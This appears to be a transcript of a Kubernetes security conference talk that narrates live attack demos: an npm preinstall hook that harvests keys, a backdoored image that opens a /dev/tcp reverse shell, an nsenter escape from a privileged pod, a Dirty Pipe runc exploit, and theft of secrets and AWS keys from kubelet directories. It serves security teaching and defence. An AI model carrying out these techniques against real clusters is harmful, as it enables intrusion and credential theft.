 Okay. Hello and welcome to, there's still space incidentally, there's probably another 20 seats if you want to let a few more people in. Okay, we'll see how we go. Hello and welcome. Thank you very much for coming to this talk. This is one of the most packed rooms I've ever delivered to. Really appreciate you attending when there's so many other high quality talks going on in this slot. Thank you. I will do my best to complete everything in 35 minutes. So I am Andy, I'm a CEO at Control Plane. We do cloud native security engineering. We're very heavily invested in training, the community, work in tag security and everything to do with CNCF, OpenSF, open source, very proud advocates. I have done various things. I've written a book which you will hear a little bit about today. There is a sand course involved. My excellent colleagues also participate in a lot of training and we'll see links to those things too. And this is my pre-eminent co-author, Mr. Michael Hasenblas, Solutions Architect at AWS. And together we wrote to the book, Hacking Kubernetes. It is available as a free download, first half as a PDF on the Control Plane website. And I will give you a whistle stop tour of what we have inside it. So what will we talk about today? Well, it's just a lot of demos and I will do my best to ensure they will work. I'm wired in. The demo gods at least don't have the ethereal Wi-Fi to contend with. So we'll start off looking at how the supply chain gets us into a cluster. We will look at what to do once we're inside the cluster. We'll demo a container breakout by kernel exploitation in the dirty pipe and we will look at how to take over a cloud account. There is so much prior art in this space. Thank you to everybody who has participated, open sourced, spoken, written about these things. We stand on the shoulders of giants and these are just a few of the luminaries who have inspired me and my colleagues to go on this journey. So what happens when Kubernetes gets deployed? The security team normally panic and that's because somebody like Captain Hashjack is all up in their clusters. Captain Hashjack is our 8-bit adversary. We're going to threat model an attack on these clusters. This is the person who we're terrified of in this instance. But this talk is called a treasure map. Why is there a treasure map involved? Well, this is because from the inside of a pod, this is what you might want to look at to try and break out. This is a guide to how we manually pen test pods. It's the microcosm of Linux inside a container. There's nothing here that is not publicly documented or well known, but helping to enumerate the ideas as we think about exactly where we go from point to point in order to break out of a container. Looking for misconfiguration, looking for vulnerabilities, looking for anything that can allow us lateral movement or pivoting or a way to further our attack. Okay, so before we begin, for any sensible system, we look to implement controls to defend against our attackers. Who are our attackers is the important question. In this case, we will model with Captain Hashjack. Why is this? Well, first of all, we want to understand what are their capabilities? What potentially could they do to us? And by extension, what are their intentions? Why would they want to do these things? This is a process of threat modeling. It is a personal passion and crusade of mine to ensure that threat modeling becomes part of the infrastructure deployment process. We've seen this in application security where it's a more established process. If this is of interest to you, tag security are doing a lot of work in this space. When a project goes through graduation in the CNCF, it undergoes an audit from tag security. And we look at the security properties, what's it supposed to do, what happens in the case of compromise, which makes it easier to deploy controls. I'll give you a whistle stop tour of what that looks like. If you're interested, there is plenty of work going on, and we're a very open and welcoming community, plenty more on the website. So the adversarial matrix. If somebody is going to attack us, who are they? What do they want? And how will they do it? So we start off with a casual vandal, script kitty, me as a younger version of myself, perhaps, just interested to know what happens when you port scan restricted ranges and find open, insecure things. I may not be a malicious intent, but there may be malicious side effects from misunderstanding or general tinkering. Generally, we should not get pwned by somebody of this description, because if there is a public CVE available for it, or Metasploits, or another security tool is able to run an automated scan and exploit it, well, we should be doing that ourselves to ensure that no drive by attacker has easy access to our systems. We have motivated individuals, but as we progress, we're more concerned with insiders. A finger in the air guess is about every 40,000 employees for a major organization has at least one insider working for another organization, another nation state potentially. Things get worse when we look at cloud services insiders, of course, because we have to trust something. We trust our operating systems. We trust the providers of the public certificates that we look at for our route's typical authorities, for internet encryption, our TLS, et cetera. We trust our hardware providers. We have to trust our cloud services providers to some extent, and we've seen in cases like the Capital One breach that inside information can lead to a more devastating impact for customers. But what we're actually caring about here in Captain Hashtag's case is the organized crime syndicate, potentially state affiliated, sponsored, but not directly linked. These individuals or groups have very wide-ranging capabilities. We've seen a lot of ransomware kick off in the last few years. Cyber insurance has become very expensive because these groups are talented. They're targeted, but they will use drive by attacks. So we do have the ability to raise the bar and ensure that we test our configuration and do not get pwned. Right. So into demos very soon, attackers think in graphs, defenders think in lists. What does this mean? Well, a defender has to tick every single line on their checklist to make sure that there is no chink in the armor, no vulnerability, no open door in the castle. Whereas an attacker just has to pivot through various things. They land somewhere, they observe the visible horizon, and they go for the next thing. It doesn't work for the next thing. Maybe the third thing works. It's another foot forward into the system. So we have to be mindful that there is a different mindset from attacking and defending perspective. This is where we get to attack trees. These give us a view of how we might pivot through a system. And then by extension, they give us an opportunity to cut the branches of the tree with specific controls. They give us a visual representation of the security of our system or the supposed security of our system. This is one from the financial services user group. Again, we do this for O'Reilly. There's a lot of open source material around this. My excellent colleague, Lewis Sten and Perry, did a fabulous talk on this yesterday. Strongly recommended to go back and watch. It was one of the most funny and insightful talks on threat modeling it's possible to give, and it's a very strong recommend. So how do we do cloud native security? Threat models are great, but it's time to get our hands dirty. Let's rock and roll. Okay. So code to cloud attack patterns. This is from the Kubernetes documentation. We begin with the code. This is where our business value is delivered. This is what developers change frequently. This is where remote code execution might occur. If we have a web facing sockets, if we have a web server with either serving some static code or serving some dynamic application, there is the opportunity for untrusted code to execute in the context of our process. We're running a process in a container. If we receive data from externally that's not handled correctly, we get a remote code execution. We've seen this in various different flavors. Log4j, the log4shell attack, classic remote code execution. Passing a string, executed in a context that was unexpected by the server, security side effect. So the first thing we need to do is get a remote code execution. Now there is another way to do this and that is the supply chain. We've heard so much about why the supply chain is dangerous, but let's exploit it quickly. So everything is software, supply chain explained like in five. When we produce software, someone else consumes it and we have a chain of producers and consumers. This means that an open source software developer is implicitly part of the supply chain of all of our software, but anything that they consume is also part of the consumer producer, transitive, difficult to reason about dependency graph. So what we're looking at here is Alice Bob Charlie production. If we can insert malicious code into the dependency graph of a supply chain, we can run our own code on someone else's hardware, on someone else's Kubernetes cluster very specifically. How do we attack? Well, we can do it in lots of different ways. We can get in the source code, we can infect the supplier, which is a very popular way of doing things recently, especially when we see things like OCTA, another supply chain attack, where in that case, a help desk provider was the one compromised, or we get into the runtime environment. Oh, wonderful. Let's try that again. I seem to have lost control of ratbags. Oh, wonderful. Everything's frozen. So this will be an interesting reboot. I will continue from my phone while I restart the machine. Okay. So just in time for the supply chain. So what we're going to see in this next demo is NPM, the JavaScript registry. What we have there is many small decomposed packages. Java pushes this idea because, sorry, JavaScript pushes this idea because the decomposition of packages is supposed to be an easy way to build and reuse code. He says, just going to reset this again. What this means is that we have, maybe you could get the slides up and we can try that way. What this means with NPM is that we have a huge proliferation of open source packages. Now, specifically with the NPM install JSON, the package JSON, we have the ability to do a pre-commit hook. That pre-commit hook allows us to execute code. In this case, what that code will do is what that code will do is enumerate the contents of our local file system. When we're installing a package, we're installing with the permissions of the user that is doing the execution. In this case, this will be me. What that means is that the contents of my local file system are available, wonderful, 112. The contents of the local file system are available for enumeration for anything that can execute in that environment. This is awfully good fun. That's not the right password for this machine. What do I have in my local environment that would be of interest to an attacker? This would also be interesting. That's got the right configuration up. Those things include my SSH keys, my GPG keys, any AWS or G Cloud tokens I have. If I'm using OAuth or an OAuth or ADC, I get a session token that is also stored on my local file system. That is what the demo will look like ever so shortly. Okay, this looks like we might almost be there. Okay, so what we are about to see is an MPM supply chain attack. That's not it. Wowsers. Okay, we are there. I think maybe possibly this will work. The demo gods, man, I feel they crucified me this time. All right, so what are we going to do? Let's have a look at the package.json. Okay, here we see our scripts pre-install xfil. The danger here, of course, is potentially exfiltration. Let's do an MPM install of this package. I'm not hosting this on the public registry, of course, because it would be taken down. What happens? What exactly happens there? Something is not on the registry. What have I done? Oh, sorry, install here, not I. Okay, finally. This is now executing my pre-commit hook. If I pull this down without reading the source code, we are essentially piping to bash. At this point, I have enumerated the contents of my local file system. These are SSH keys. I can install minors. Okay, and with this timing, I'm going to move on a little bit quickly. So what just happens, I hear you ask. We pulled something from a public registry. We didn't read the source code before installing it, and it was able to execute its own untrusted code in the context of our application. It must have been this slide. Okay, so that was what I was explaining. Right, so we ran this backdoor open source package, pre-install hook, abuse is privilege, profit. So what could this actually look like with an end-to-end running this remote code execution? Down at the bottom here, we have the malicious code into a target library. So we're talking about MPM here, but we can do this for any application package. Once that gets built into developer code and is running in our Kubernetes clusters, we can fire a reverse shell. A reverse shell busts outwards through a firewall. So instead of me SSHing onto a server, the server SSHs onto an open port that I have on a public IP somewhere. And this is when Captain Hashjack in his nefarious sailboat there is able to get access to our systems. So how do we fix this? Well, we probably want to have 2FA on every type of token that we use. Plaintext credentials, of course, are easily reusable. We see these attacks more against crypto wallets because, of course, that's easily fungible, I guess, or transferable value. And signing provides some value there. Okay, so now we'll move on to the supply chain reverse shell. This is the concrete example of the previous version. So Captain Hashjack wants to put his code into our dependencies and we get those running in production. This is the reverse shell idea. So we start with attacking the victim's machine. We're running code in their context that they do not expect. We get a reverse TCP connection. So this busts outwards from a firewall. This is also the log4j problem. Unless our firewalls are monitoring or are restricted, which is not always the case or difficult to do, then we can get to a potentially unknown external location. This is a TCP version of the attack. There's a DNS version as well, of course. There are other slightly more nefarious ways to do it, but it's very difficult to block. So similar to previous, we will use this malicious backdoor image in a public container registry. That will be run inside our cluster and this will then fire the reverse shell where we connect courtesy of Duffy, one of the sick honk luminaries. We will also exploit a misconfiguration in there to, if we run this, bust out and root the node that the container is running on, because as you can see, we're using hostpid and privileged, and this is why it is bad. Okay. So now we go into, right. So in classic British Blue Peter style, here is one I prepared earlier. You may not believe me by judging by the previous talents. All right. So what are we going to do? First of all, we're going to bounce through a public endpoint called ngrok. So what we're doing here is we're getting a free IP on the public internet with a port. At the bottom here, we see probably a little large. At the bottom here, we see a log of what's going on. And at the top here, we are going to run, which version are we on? I guess, definitely more recent. We're going to run this. So we'll run a reverse shell. This is the location of the IP in the port that we're going to fire back to. The deal with reverse shells is that bash contains a virtual dev TCP endpoint, which is really easy to hook a shell to and get this reverse shell action. It's probably one of the worst decisions in the history of computing. And at this point, we're just going to deploy something malicious. So this will look a little bit like cool. Maybe it is the other one then. Or possibly I've got it. That is actually nice. Okay. Let's try the other version of this. So that worked. What we're seeing here is the reverse shell catcher. Boom. That's a great relief. Cheers. Okay. So what we've seen there is we've deployed this malicious image with a poorly configured security context. And this is bounced through that public IP back to me standing waiting for it. And I've now got a connection into this shell, sorry, into that pod. So at this point, the running is root. Obviously, that's a horrendous idea. Are we privileged? Well, what's the contents of dev? We can see everything. So at this point, we can escalate, mount the host file system, using NS Enter attack. Let's just have a look at that quickly. So NS Enter is the namespace enter everything in Linux terms is the namespace. And we're going to jump in. And at this point, we can now see the contents of root on the host because we've mounted in, he says, yes, there we go. So that's the host file system. And we can also see the host process table. Wonderful. Those are all things we should never be able to see from inside a container. But of course, because we've entered those host namespaces, we've broken the abstraction. All right, let's keep on moving. So what did we just see? We saw that malicious image that was pushed into a public location was then used to run in production. When it ran, it fired that remote reverse shell back to a place that I controlled. And that gave me access to the pod from externally. At that point, again, it's observing the visible horizon, escalating continuing to see are their data stores, is their private information, are their keys, are their quant algorithms that I can steal. It's a bad day when someone has that initial foothold, the remote code execution inside your systems, because then more nefarious things can happen. Okay. So if that wasn't stressful enough, we will now try a kernel exploit. It's not a container escape. It's a process that wants to be free. Good. See of another SIGHONK luminary. Okay. So what is a container escape? On a container, we're sharing a kernel. A virtual machine bootstraps the BIOS. It emulates the full end-to-end bootstrap of a system, which is why it's slower. It's also a different security model because it's using things like hardware extensions and it traps instructions that go down to the CPU and handle them slightly differently depending on context. It can be more secure. There have been escapes from everything and nothing is entirely secure. The compromise we make with a container is that in order to run very quickly and to bin pack many containers onto one host, we start a process on a running kernel. So we're sharing a single kernel amongst all the processes on a host. This allows us to start very quickly, but it changes our security model. And as we see in this case, those host resources should be protected. They shouldn't be available. The point of containerization or virtualization is to abstract those away and not make them available. Now, many people have said containers are not a security boundary. Well, many things are not a security boundary, but in real-world practical use, that is unfortunately what we find ourselves with. So while they're not a security boundary safe for maybe the very highest level of data classification, they can certainly be more secure than VMs because we run a single process per container and then we have the opportunity to run granular, fine-grained, process-restricted controls, Setcomp, Apama, SC Linux, our standard suite of capabilities that come with Linux and the extended controls that come with Linux, instead of running everything in one monolithic virtual machine. Everything is down to use case and configuration. Micro VMs provide an intermediate version of this, where we get some level of hardware abstraction with a very fast boot up and still OCI compliance. This is a list of recent container vulnerability escapes. It's been a busy year, courtesy of Chris Nova. Again, this is where the contention lies. The kernel is not a security boundary, but then really the CPU is not a security boundary, as we've seen. Are we going to just decompose everything onto computers, under people's desks like we used to do? No, we still have to move at the time, so there is some difference here. This is the view of namespaces. I won't go into this too much more, but suffice to say we are sharing a local network between our container workloads and a pod. The C-group's amount of process namespaces should be individual, but then we get to share storage network and a couple of other things. Plenty more on this in the book. C-groups V2 come with some better security features. They work in a different way to C-groups V1. They're really hyper complex, but provide a lot of utility. C-groups V1 are very escapable. On to dirty pipe. This is the CVE that was dropped with about a week's notice, which is not much time for people to patch systems. It is a dirty page vulnerability. That means it permits the injection of code into process memory that is owned by root. An untrusted user can scribble some instructions, stick them into a piece of code that root is going to run, executable memory, and root will run those things. If the code that we stick in there is another reverse shell, back to where we're sitting on the same box, we have root access to the box by virtue of this escape. It's got a specific nuance or foible, which is you can't write the first few bytes. So what this exploit does courtesy of my friend and colleague James Cleverly-Prance is exploit the proc self-exy attack. Writes a small piece of assembler assembly to build something smaller than 4k, which fires this reverse shell back. Okay, let's break out of a container. So this is all virtual machine-based. Let's just... Oh, sorry, one second. Get out of there. Okay, so as you see, we will... Okay, this is actually provisioning a vagrant box, so that might take one second, because this reverse shell concept is kind of fundamental to a lot of attacks, because it's really very useful. What we're doing is we start the container, we open our socket waiting as the un-privileged user for root to connect back to our reverse shell, but instead of going across the internet, we're just using the primary network adapter of the host. And this is because in this case, we're not firewalling the... We're not using... Okay, we're not preventing network traffic between the container network across the container bridge onto the primary adapter of the host. So sweet. All right, so what have we got here? First of all, let's check the kernel version. We're on a vulnerable kernel. Excellent. Let's go and have a look at what we've actually got in terms of code. We have the runcsmall.nasm. So ultimately here, we are using the elf header, and we'll ignore most of this, but what we care about here is this is our good old reverse shell. We're going to insert this base64 code into the runc binary, unbase64, and it looks like that two to five devtcp, and we've got that same reverse shell again. And with any luck, off we go. Okay, so we have built the thing, and now check who we are. We are vagrant and un-privileged user, and let's run this. Okay, so we're now listening. We have executed, and I will just check that it runs into me. Oh, there we go. Wonderful. So we're now root. So what's happened there is by running this exploit and injecting this code, we've fired that reverse shell back, and interestingly, it's dumped us into the file system location that the mount namespace was mounted from. So of course, a container and the processes inside it have to exist on the host. We're running on a shared kernel, but we paint this picture for the container that says you can only see what the kernel wants you to see. In this case, you're the only special process running on the host. Here, now that we've broken out, we can see that the abstraction has been shattered and we've dropped into the container d runtime location where this image is, and we can see the contents of the image itself. What is the, oh, where perhaps? What is the upshot of this? Well, at this point, we have got access to, for example, the cubelets, and we can root the whole system. So the idea here really is to use the container, cloud-native paradigm of constantly rebuilding, having fast deployment pipelines, and using our CICD to ensure that we're always on the latest image, but this is a kernel vulnerability. So it's in the host system. It's the same thing. Our AMI bakery or our VM golden image should have a well-oiled pipeline so that we can ship patches as soon as they arrive. In this case, as quickly as is necessary. Okay, so we are now out on the host. We've broken out of the container and we sat on the host file system. What do we want to do next? Attack the cubelets. Here is a high-level view. We can see that various things from the node roots are exposed into the node user. And by that, we're talking about the workload that's running there. So what do we see? Well, we've got the container runtime, the storage, the orchestrator injected environment variables, and the secrets and config maps. Now, again, everything that's mounted into the container must exist on the host. And one of those things is secrets. When secrets are pulled from the Kubernetes API by the cubelet, the API will verify that the node is running the workload that is authorized to pull those secrets. You can't just enumerate everything as long as the node authorized to plug in is correctly configured. So in this case, we are going to, from the cubelet host, so we've routed the cubelet, we'll enumerate the file system, find out where the service accounts are, and exploit the stolen service accounts. He says, let's get out of there. This is supposed to be set up beforehand. I apologize. There we go. All right, so let's make sure that everything is clean. That is how the sausage is made. Maybe I'll just finish it here. So in this case, we've already achieved an exploit of the host system. So instead of reusing the same container, I'm just going to move into the next system here, and networking may be problematic. We're getting there. Sweet. Okay, we're there. So when I pentest systems, I drop in my own special set of tooling, and that's where it is. So I've now got my local shell configuration is now up on this host. So I'm on a GKE node. I've routed the node because we saw in the last attack that we can get out that way. So let's just, so all right, I'm roots on the node. We've had our reverse shell supply chain attack. We've attacked the kernel and broken out onto the host. So we're now on the cubelet or the cubelet node. What can we do from here? Well, let's have a look at this alias. So what will this do? Okay, ksecrets, filesystem, dump. It looks in valid cubelet pods, everything for Kubernetes, either volumes or projected volumes, because bound service account tokens, which are the new actually iterable way of attaching a claim to a service account token, strongly recommended to use exist in these locations. And then we'll have a look for things like namespace token or certs. Let's just have a look at what is in that directory that we're enumerating. Don't forget, we are the root user. The root user is omnipotent, omniscient. They can do everything on the host because they must be able to debug, turn things on and off as necessary. So we're exploiting something that is by design, but we're going under the covers. Let's see what's there. There are plenty of things, and it's not really that visible. So let's try once more. Okay, so we can see that we've got lots of certificates and keys and all this kind of thing. But what are we actually looking for? Well, if we look for secrets that are mounted in that are not our back secrets, they are not service account tokens, whoops, we have got potentially an undeployed thing. Let's just have a double check as to why that's not working. Okay, because the network went down at that point. Okay, let's try that again. Okay, so we've got some AWS keys that have magically appeared. Wonderful, thank you configuration. Okay, so what does this mean? This means that an automated operator or some process inside the cluster needs these keys to do a thing. Maybe it's a special version of auto scaling. Maybe it's to run Terraform. Maybe it's to deploy S3 buckets in an ad hoc fashion or some other crazy version of that. So what can we do with these? Well, potentially we can escalate to the cloud account. So we're using these stolen service accounts, but in this case, their service accounts for AWS itself. Okay, so don't multi-tenant data classifications. This is my favorite view of cubelets. If we put data classification, if you put sensitive and unsensitive data on the same cluster, the unsensitive data will be less well secured in our threat model. And if we can break out onto the host, we can potentially get access to the more sensitive data. So cloud account takeover, this is ultimately what happens. No operators were hurt in the making of this GIF. What are we going to do? We're going to exploit those stolen credentials. That's not the one we want. Let's use this one. Okay, so we've got those credentials. What can we do with them? Let's get off those hosts because we've now stolen them. Right, we are going to hone the AWS account that those keys belong to because why not? We've got access to them. Uh-oh. This is a canary token. That means that the owner of this token has been notified that this token that was left like a honeypot in the cluster has been used. It should never be used because it's not a real token, but it's left there in order to tempt an attacker like Captain Hashjack to enumerate and explore what it is. All I've done there is try and identify my caller identity. It's a simple call to understand what's the name of this thing. Could it give me further permissions instead of just brute forcing every permission set? I want to do a targeted check to see maybe it's S3 related, maybe it's got IAM permissions, but a canary token will go off like a Christmas tree, like an alarm bell. These are scattered across everything that I've ever touched, my infrastructure, my local machine. It's a way of making sure that in the event of our preventative controls failing or the things that we rely on and trust, like the kernel, like our cloud provider, if these things fail underneath us, we still have a detective element that allows us to understand that we've been breached. Okay, where am I? Okay, so what's next? There are lots and lots of different ways to be breached in a Kubernetes system from the application workloads all the way through the cluster configuration and deployment. Once again, this is where our pod attack map comes in handy. By thinking about how we logically enumerate these things, we don't need to just run tooling that's very loud and noisy. We can instead be more selective. Container security tooling will alarm or alert when unusual or non-standard behavior, that's what I'm looking for. It fires off. So doing this in a more structured approach is a more stealthy and silent way of doing it. This is what control planes do for a living. If you're interested by these things, do please come and talk to us. And with that, thank you very much for your attention.